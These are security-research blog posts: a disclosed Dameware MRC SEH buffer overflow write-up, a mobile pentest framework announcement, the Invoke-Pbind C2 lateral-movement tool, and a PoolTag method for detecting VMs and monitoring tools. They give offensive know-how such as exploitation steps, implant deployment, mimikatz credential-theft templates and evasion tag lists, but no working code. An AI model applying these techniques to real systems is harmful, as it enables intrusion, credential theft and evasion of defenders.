CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version (at the time of writing) for Dameware MRC (12.0.5) and it has been assigned CVE-2018-12897. This vulnerability is due to insecure handling of a user input buffer which ultimately allows for overwriting Structured Exception Handler (SEH) addresses and the subsequent hijacking of execution flow.

Below is a video demonstration of exploitation for proof of concept of this vulnerability.

Solarwinds have been contacted about this issue who have acknowledged it and have released a version which reportedly contains the fix for the vulnerability, version 12.1. However, at the time of writing, this version doesn’t appear to be available from the customer portal and if you are affected by this issue, it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within in the GUI has several input fields. The majority of these fields lack appropriate input sanitization, leading to crashes when entering a large amount of input (more than 3,000 characters). However, for the proof of concept, only one of these fields was used; the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it may be necessary to fuzz input fields and parameters, an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour, however this was not the case in this instance. Simply using a large number of A’s (over 2000) or any other character would result in the application terminating unexpectedly.

Looking at this process in a debugger, it becomes clear what is happening. The input is being written to the stack and has overflown the SEH addresses. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed how they were entered and have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable set of “POP, POP, RET” instructions. The buffer length before the overflow was identified using Metasploit’s helpful “pattern_create” and “pattern_offset” utilities, taking care to observe the bytes surrounding the overflow as the null bytes have to be discounted. As the DWRCC.EXE (main executable) is not being rebased on each execution, the instruction set found at address “0x00439D7D” was chosen. The executable was compiled without common protections, including ASLR which would have made hardcoding an address in the shellcode infeasible.

The next step is to overwrite the SEH and next SEH addresses with the address of the instruction found above and the op codes for a small jump over that address. Once executed, the execution flow should be then directed into the area of memory on the stack under our control. For both the address and the jump, UTF-16 characters were used so to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit which is the first hurdle down, now we just need to make sure it returns back and executes the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used will need to be UTF-16 compatible. Luckily the alpha2 encoder in Metasploit has the ability to generate UTF-16 compatible shellcode. However, the one caveat is that it requires that a register holds the address of the beginning of the shellcode when the shellcode is executed. To achieve this, an offset would need to be calculated from an address which is unchanging on each runtime independent of the operating system version.

After taking into account the offset, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” could be used to execute operations in between the null bytes to get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me and so I thought I would give it a go here to see how it works using the simplest form of venetian shellcode There are some fantastic write-ups which discuss this technique and its history including Corelan’s tutorials and Fuzzysecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations, they can be bypassed but they still offer an added layer of protection to help prevent or increase the complexity required for exploitation of buffer overflows. These are not new and have been around for a good while now, its 2018 and yet still many applications are being compiled without these protections.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed which will lead to a crash but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overflow Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by creating a symbolic record at the end of the records and, at the point when an exception is raised, it checks to make sure that this is still present, thereby determining the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy settings.

An older protection mechanism known as SAFESEH, can be set via a compilation flag. This works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, one being including the requirement to recompile binaries with this flag to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience and I fully recommend), I was looking to find something I could use my new found skill set to practise on. Finding this (while not the most exciting) was certainly rewarding and taught me some additional techniques that I may not have otherwise come across. However, the teaching was done by security professionals who have written some insanely useful and easy to follow tutorials. I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for Venetian Shellcode can be found below but the entire set of guides are invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacts Nettitude to inform them that version 12.1 has been released which contains a fix for the reported issue.
  • 06 September 2018 – Public disclosure

Introducing Scrounger – iOS and Android mobile application penetration testing framework

Scrounger is a modular tool designed to perform the routine tasks required during a mobile application security assessment.  Scrounger conveniently brings together both major mobile operating systems – Android and iOS – into a single tool, in a way that is easy use, well documented, and easily extensible.

Where it differs

Scrounger consists on a number of modules that were built on top of a strong core. The rationale is to allow easy extensibility, just like Metasploit does. As a result, if you want Scrounger to perform additional checks, you can simply add a new module that can then be executed either through Scrounger’s interactive console or its command line interfaces.

Furthermore, it contains both Android and iOS modules, so, instead of using multiple tools to help you during a mobile application assessment, Scrounger offers you the possibility to use only one tool and learn only one set of commands, that will work for both operating systems.

Scrounger already comes bundled with several modules that can be run to perform several checks against mobile applications.

Requirements

Scrounger has a few requirements, such as the installation of certain packages on the host and certain iOS binaries.

However, it already packs most of the iOS binaries and offers a module that installs them on the device. The package requirements are also specified on the Scrounger GitHub page.

If the prerequisites are not satisfied, Scrounger will simply not run certain modules. All the modules with prerequisites that are satisfied will run without any problems.

The other main requirement is to have jailbroken and rooted devices.

Usage

There are two main ways of using Scrounger: command line or interactive console.

The command line will be used mainly when performing all checks or making any automation scripts. On the other hand, the console will be used to run only a certain number of modules or when performing specific actions such as, decompiling, recompiling and signing applications, extracting certain files, etc.

Command line options

When using the command line, you can list the available modules and their arguments, list the available devices, run a full analysis (which runs all the modules for a certain type of application – Android or iOS) and run a specific module while passing the required arguments.

Here is an example of running a specific module, using the command line Scrounger, on an Android application.

First, we start by listing the required options for the module that we want to run and then we run it.

Console Examples

The console is the main attraction. It is packed with several powerful options and there is plenty of room for further improvements. The console already offers autocomplete (including file path autocomplete), module search, the ability to re-use results from other modules as arguments, command history between usages and the ability to reverse search the used commands.

Here is an example of the console listing specifically the available modules for iOS.

When listing modules, a brief description of what the module does will also be displayed. For both iOS and Android there are two main types of module, misc and analysis. The misc modules are auxiliary modules that perform several actions against the applications, their files and/or devices. In order to assess if there are any security flaws, the analysis modules analyses either the application files, the application itself or the application-generated files.

First, we run the command options to show the required arguments for the specific module (as you would when using Metasploit). The options command also shows the global options. If this is set and a module with the same argument is used, its value will be automatically set. Once the required arguments are set, we run options again to make sure that everything is set properly and run the module using the command run.

As we can see, Scrounger will generate some output and results from running certain modules. These results can then later be used by other modules.

We can use the command show results to see all stored results returned by the execution of other modules. The print command can be used to show the value stored on a certain result, but also to print values stored in global or module arguments. If a result is of interest to run in another module, it can be used by setting the required argument with the desired result starting with the result: keyword. When setting these arguments, autocomplete will also look in the saved results table and suggest them. Once everything is set, we can simply run the module.

Device Examples

Several modules will require interaction with either an iOS or Android device. It is quite easy to add a device both in the command line or in console.

In this example, an Android device is added to the console using the add_device command (this also offers autocomplete: it will try to get the connected devices and show them as an option). Then, using the set global command, we set the device to be device 1 . When using the misc/list_apps command, since the global option is already set and there is a module argument with the same name, it will automatically fill in the value for that argument.

Extensibility

Scrounger can also be easily extended to include custom modules and perform custom checks depending on the pentesters preference (and we welcome submissions to be included in future releases of Scrounger). When installing Scrounger, all the necessary directories will be created for you. It creates a custom modules directory under ~/.scrounger/modules/custom.
In the following example, a custom module was created under custom/analysis/ios/false_positive, meaning that this false_positive module is run against iOS applications.

Creating your own module

To create a custom module is quite simple and requires only three steps: creating a file under the correct module directory depending on what your module is looking to do, creating two variables meta and options, as well as a function run.

Here is an example.

 

The newly created file will be automatically added to the list of available modules the next time scrounger-console is launched. There are a few more elements to consider when it comes to creating the modules, especially analysis modules. For full details, Scrounger offers comprehensive documentation on all the available modules and a detailed explanation on how to create custom ones: https://github.com/nettitude/scrounger/docs

Real life case scenario

On a typical mobile application assessment, we would try to run as many modules as possible. To facilitate that, there is a module that runs all modules called full_analysis in the console and an option -f in the command line.

This option/module will decompile the application and run all the necessary auxiliary modules and run all the other available modules. It then creates a JSON file that contains the results and details of each module that returned report=True. The command line executable also has an option ( -p) that will read a JSON file and print all the results and details to the console.

Future work, feedback & special thanks

There is a lot in store for Scrounger’s future.

The next features to be implemented are included in the last section of the README in Scrounger’s GitHub: https://github.com/nettitude/scrounger.

Any feedback, ideas or bugs can be submitted over on GitHub.

Additionally, a special thanks to all the existing tools and their developers, as they have contributed to bringing Scrounger to life. Just to mention a few:

Download

github GitHub: https://github.com/nettitude/scrounger

Extending C2 Lateral Movement – Invoke-Pbind

Invoke-Pbind is a mini post exploitation framework written in PowerShell, which builds C2 communications over SMB named pipes using a push rather than a pull mechanism. Pbind was initially created to overcome lateral movement problems, specifically in restricted environments where the server VLAN could not directly talk to the user VLAN (as it should be in every environment). The tool was designed to be integrated with any C2 framework or run as a standalone PowerShell script.

Video Demonstration

If you just want to skip to the video tutorial, then you can find that here and at the end of this post.

The Problem: Segregation and Strict Firewalling

This is useful when you have compromised an organisation and have C2 comms over HTTPS, traversing the corporate proxy server out of the network from user’s workstations, but the target dataset that you are looking to obtain is located down server VLAN with a firewall restricting both inbound and outbound traffic. In that scenario, firewall rules are always going to allow for specific traffic to traverse over pre-approved services. The following diagram illustrates one such situation, where the environment allows limited services from the user VLAN to the server VLAN, but allows no ports in the reverse direction.

What options exist for C2 comms

The following are some options for C2 comms and their mitigations, resulting in failure.

Method Mitigation Result
Direct Internet Access Blocked by Firewall Outbound Fail
Traverse Through HTTP Proxy Blocked by Firewall Outbound Fail
TCP Reverse Shell Blocked or likely detected scanning for open ports Fail
TCP Bind Shell Blocked by Firewall Inbound or service running on open ports, no closed ports detected Fail
ICMP Blocked by Firewall Outbound Fail
Daisy over SMB in User VLAN TCP port 445 blocked from servers to workstations Fail
Daisy over HTTP in User VLAN Same as standard reverse all blocked ports Fail
DNS Authoritive DNS is only permitted by the Proxy server, thus not possible for C2 comms from the server VLAN. Fail

To be clear, at this point the problem isn’t about getting execution, it’s about having reliable C2 comms that afford the user output for all commands executed and to use the implant as a foothold or staging point to further attacks against servers in the restricted environment.

The Solution

“A named pipe is a logical connection, similar to a Transmission Control Protocol (TCP) session, between the client and server that are involved in the CIFS/SMB connection. The name of the pipe serves as the endpoint for the communication, in the same manner as a port number serves as the endpoint for TCP sessions. This is called a named pipe endpoint.” – https://msdn.microsoft.com/en-us/library/cc239733.aspx.

.NET has a class for creating and interacting with named pipes:

Where TCP port 445 is open into a server environment, we can overlay the SMB protocol and use a named pipe to share data between the workstation and server, providing a method for exchanging data (comms). The following commands make up the basis of creating a named pipe with an access rule that allows “everyone” access:

Since the days of abusing IPC$ with anonymous access (CVE-199-0519), and RID cycling your way to a plethora of goodies, Microsoft have said “no – though shall not pass” – non Microsoft direct quote. In a domain environment, any user can create a domain authenticated session to the $IPC share, which can then be piggy backed to gain access to the named pipe. Here is a simple script in PowerShell to create an authenticated session. One quick problem to overcome: While the ‘AccessRule’ applied to the pipe may look like it allows “everyone” access to the named pipe, this is not actually the case.

Interacting with a named pipe is also fairly straight forward as long as you know the data type of what is being read; as we create the server we know how to handle to pipe as shown by using a simple StreamReader:

Design

When we came up with Invoke-Pbind, the following principles were implemented.

Client/Server Model

To allow for inclusion in a C2 framework, two script blocks were created, client and server. The server starts and sets up the named pipe on a remote target (server). The client then connects to the named pipe and exchanges messages over TCP port 445 (SMB). The client runs through an existing C2 implant and by using script blocks and run spaces, it is possible to use the client non-interactively for better interaction with most C2 frameworks.

Token Passing

When sharing a common space such as a named pipe, it is imperative that messages exchanged between the client and server are not overwritten prior to being picked up by their counterpart. Control messages are used in combination with TRY and IF statements to create rules for when a client or server should read or write from the named pipe.

Security

During the generation of the script blocks, at run time, a unique key is generated and used to encrypt messages between client and server. Pbind supports AES 256 encryption. To initiate a connection to the named pipe from a client, a shared secret is also supported to stop tampering with the named pipe. If the client does not provide the correct secret, the named pipe will close.

Injection/Execution

There are two main methods included that inject the implant into target hosts. These are modified versions of Invoke-WMIExec and Invoke-SMBExec (credit to Kevin Robertson for these scripts); both scripts have been updated to support passing passwords, where previously they only accepted hashes for authentication. The implant is a self-executing script block that is passed as the payload. The script runs WMIExec by default but contains a switch parameter to invoke SMBExec:

To provide additional deployment flexibility the script also includes an exe method. This method uses CSC and Windows .Net automation DLL to compile the implant into an executable that can then be deployed and executed through any means.

NOTE: Creating a named pipe does not require administrator credentials so the executable can be run as a non-privileged user. On the other hand, WMIExec and SMBExec require administrator privileges.

The exe option continues to generate unique variables that are hardcoded into the executable, for use in cryptography and such like. The exe option can be used offline to create an executable implant and is not tied to an interactive session through a C2. To talk to the implant, the script supports a CLIENT option that is used to interact with a deployed implant, the options for which are provided when the implant is compiled:

This flexibility allows for the deployment through any means:

  • DCOM
  • RDP
  • Shared Folders
  • WinRM
  • SCCM
  • Anything……

There are a number of options that are configurable. If no options are selected, the script reverts to pre-set or randomly generated values. The following options are configurable:

  • KEY – Defaults to a randomly generated AES 256 Key – Allows for a key to be specified, commonly used in client mode.
  • SECRET – Defaults to random 5 character value – Allows for specific secret to be used.
  • PNAME – Defaults to random 8 character value – Allows for specific pipe name to be chosen.
  • TIMEOUT – Defaults to 60 second – Used to change the wait time for the client to connect to the Implant, used in slow networks.
  • EXE – Generates a stand-alone executable;
  • CLIENT – Runs the script in client mode to connect to a deployed Executable;
  • TARGET – used to specify a remote IP Address.
  • Domain/User/Password/Hash – used to provide credentials for authentication.
  • Domain2/User2/Password2 – used to map a drive to the target system, when a hash is being used as the primary authentication mechanism.
  • Dir – used in EXE mode to output the generate executable.
  • Automation – used in EXE mode, directory location of the Automation DLL.

Interaction

There are 3 main functions that have been created to interact with the implant from a client. The first and probably the most useful, especially when we introduce templates, is Pbind-Command. This simply registers a command in a variable that is read in by the client and passed to the implant (server) before being executed. A simple example is shown below:

Pbind-module c:\folder\powerup.ps1The second is Pbind-Module, which allows you to read in any other ps1 file and have it injected into memory on the implanted host. Pbind-Command can then be used to execute any of the functions in the ps1 script. This has a limitation and does not work well within a C2 setup, because all scripts have to be local to the client. In most cases the client is already running on a target workstation and would require all scripts to be uploaded to the client before being sent on to the implant.

Pbind-Squirt was a designed to help resolve the limitations of Pbind-Module. The idea for this function was to embed a number of scripts as base64 objects into the script that can then be called and auto executed into memory on the client. The only one that has been embedded is PowerUp, to assist with asset review on newly implanted hosts.

However, in practice neither Pbind-module nor Pbind-squirt were optimal and instead a new solution was constructed, called ‘Templates’. Effectively this was just a better way to interact with the Pbind-Command function. It was decided that by creating a number of small scripts which can automate tasks, it is possible to carry out similar ideas to Pbind-module and Pbind-squirt. Tasks such uploading mimikatz and extracting passwords, uploading PowerView and running queries or uploading invoke-SMBExec and attacking other machines, can all be scripted using a similar template to the one below:

The best way to see how the script runs is to download the script and have a go. The screenshot below shows a simple example of running the script locally under the context of another user, while also executing commands.

Video Tutorial

We have created a video tutorial to help illustrate the use of Invoke-Pbind.

Download

github GitHub: https://github.com/nettitude/PoshC2/blob/master/Modules/Invoke-Pbind.ps1

Using PoolTags to Fingerprint Hosts

Commonly, malware will fingerprint the host it executes on, in an attempt to discover more about its environment and act accordingly.

Part of this process is quite often dedicated to analyzing specific data in order to figure out if the malware is running inside a VM, which could just be a honeypot or an analysis environment, and also for detecting the presence of other software.  For example, malware will quite often try to find out if a system monitoring tool is running (procmon, sysmon, etc.) and which AV software is installed.

In this article, we will introduce another method of fingerprinting a host that could be potentially abused by malware.

Common ways of host fingerprinting

In this section we provide a short list of well-known ways of detecting a VM environment, and the presence of other security software, that are often applied by malware. Note that the following list is not exhaustive.

  • Process Enumeration
  • Loaded modules Enumeration
  • File Enumeration
  • Data Extracted from Windows Registry (Hard disk, BIOS etc…)
  • Loaded drivers enumeration
  • Open a handle to specific named device object
  • System Resources Enumeration (CPU cores, RAM, Screen Resolution, etc…)

The PoolTag way

If you have some experience with Windows kernel drivers development & analysis, you should be familiar with the ExAllocatePoolWithTag [1] function that is used in order to allocate memory chunks at kernel level.  The key part here is the ‘Tag’ parameter that is used in order to provide some sort of identification for a specific allocation.

If something goes wrong, for example because of a memory corruption issue, we can use the specified Tag (up to four characters) in order to associate a buffer with a code path in the kernel driver that allocated that memory chunk. This method is adequate for detecting the presence of kernel drivers, and thus software that loads modules in the kernel that could potentially circumvent the fingerprinting methods mentioned above, which rely on information that a driver could potentially alter.  In other words, it is ideal for detecting the stuff that really matters from the malware author’s point of view.

For example, security/monitoring software might try to hide its processes and files by registering callback filters at kernel level.  An analyst might try to harden their VM environment by removing artefacts from the registry and other things that malware is usually searching for.

However, what a security software vendor and/or analyst probably won’t do, is modify specific kernel drivers used by their own program and/or system/VM environment to constantly alter the Tags of their kernel pool allocations.

Getting PoolTag Information

This information can be obtained by calling the  NtQuerySystemInformation [2] function and selecting SystemPoolTagInformation (0x16) [3] for the SysteminformationClass parameter.

The aforementioned function and the associated SysteminformationClass possible values are partially documented on MSDN, but fortunately with some online research we can find some documentation done by researchers. In particular, Alex Ionescu has documented a lot of otherwise undocumented stuff about Windows internals in his NDK [3] project.

For this proof of concept, we wrote our own version of getting and parsing PoolTag information, but if you want to go the GUI way to experiment with the results, then PoolMonEx [4] is a really nice tool to play with.

For instance, the following is a screenshot of our tool’s output.  Source code below.

Which you can compare with regards to the Nbtk tagged allocations results from PoolMonEx as shown below.

QueryPoolTagInfo.cpp

Defs.h

Targetting PoolTag Information

In order to give some sense to the acquired PoolTag information, it is necessary to analyse those drivers that we are interested in. By searching for calls to ExAllocatePoolWithTag we can log specific tags used by those drivers and keep them in our list.

At this point, you should be aware that any driver can use any tag at will, and for that reason it makes sense to try to find some tags that appear to be less common and not otherwise used by standard Windows kernel drivers and/or objects.

With that being said, this method of detecting specific drivers might produce false positives if not used with extra care.

A PoolTag Example List

For the sake of demonstrating a proof of concept we have collected some PoolTag information from specific drivers.

  • VMWare (Guest OS)
    • vm3dmp.sys (Tag: VM3D)
    • vmci.sys (Tags: CTGC, CTMM, QPMM, etc…)
    • vmhgfs.sys (Tags: HGCC, HGAC, HGVS, HGCD etc…)
    • vmmemctl.sys (Tag: VMBL)
    • vsock.sys (Tags: vskg, vskd, vsks, etc…)
  • Process Explorer
    • procexp152.sys (Tags: PEOT, PrcX, etc…)
  • Process Monitor
    • procmon23.sys (Tag: Pmn)
  • Sysmon
    • sysmondrv.sys (Tags: Sys1, Sys2, Sys3, SysA, SysD, SysE, etc…)
  • Avast Internet Security
    • aswsnx.sys (Tags: ‘Snx ‘, Aw++) (We used single quotes in the first because it ends with a space character)
    • aswsp.sys (Tags: pSsA, AsDr)

Conclusion

Just like every other method, this one has its strengths and weaknesses.

This method cannot be easily circumvented, especially in 64-bit Windows where the Kernel Patch Protection (Patch Guard) does not allow us to modify kernel functions among other things, and thus directly hooking those such as NtQuerySystemInformation is not a solution anymore for security and monitoring tools.

Also, this method is not affected by drivers that attempt to hide/block access to specific processes, files, and registry keys, from userland processes.

In addition, this method could be potentially used to fingerprint the host further.

By searching for specific tags of Windows objects that are being introduced in the OS, we can determine its major version.

For example, by comparing the poolTag information (pooltag.txt) that comes with different versions of Windbg, in this case Windows 8.1 x64 and Windows 10 x64 (Build 10.0.15063), we were able to find PoolTags that are used in Windows 10 by the  netio.sys kernel driver such as Nrsd, Nrtr, Nrtw, but not in Windows 8.1

We later did a quick verification by using two VMs, and we could indeed find pool allocations with at least two of the aforementioned tags in Windows 10, while there were none of those in our Windows 8.1 VM.

That being said, it is a common and good practice for kernel driver development to use tags that make some sense based on the module that allocates them and their purpose.

On the other hand, as mentioned already, PoolTags can be used at will and for that reason we have to be careful about which ones we are targeting.

One last thing to mention is that PoolTag information changes all the time, in other words chunks of memory are constantly allocated and de-allocated, and for this reason we should keep this in mind when choosing the PoolTag to search for.

Even though this method might look more experimental than practical, in reality when malware is searching for specific monitoring and security software, PoolTag information can be very reliable.

References

  1. https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-exallocatepoolwithtag
  2. https://msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
  3. https://github.com/arizvisa/ndk
  4. http://blogs.microsoft.co.il/pavely/2016/09/14/kernel-pool-monitor-the-gui-version/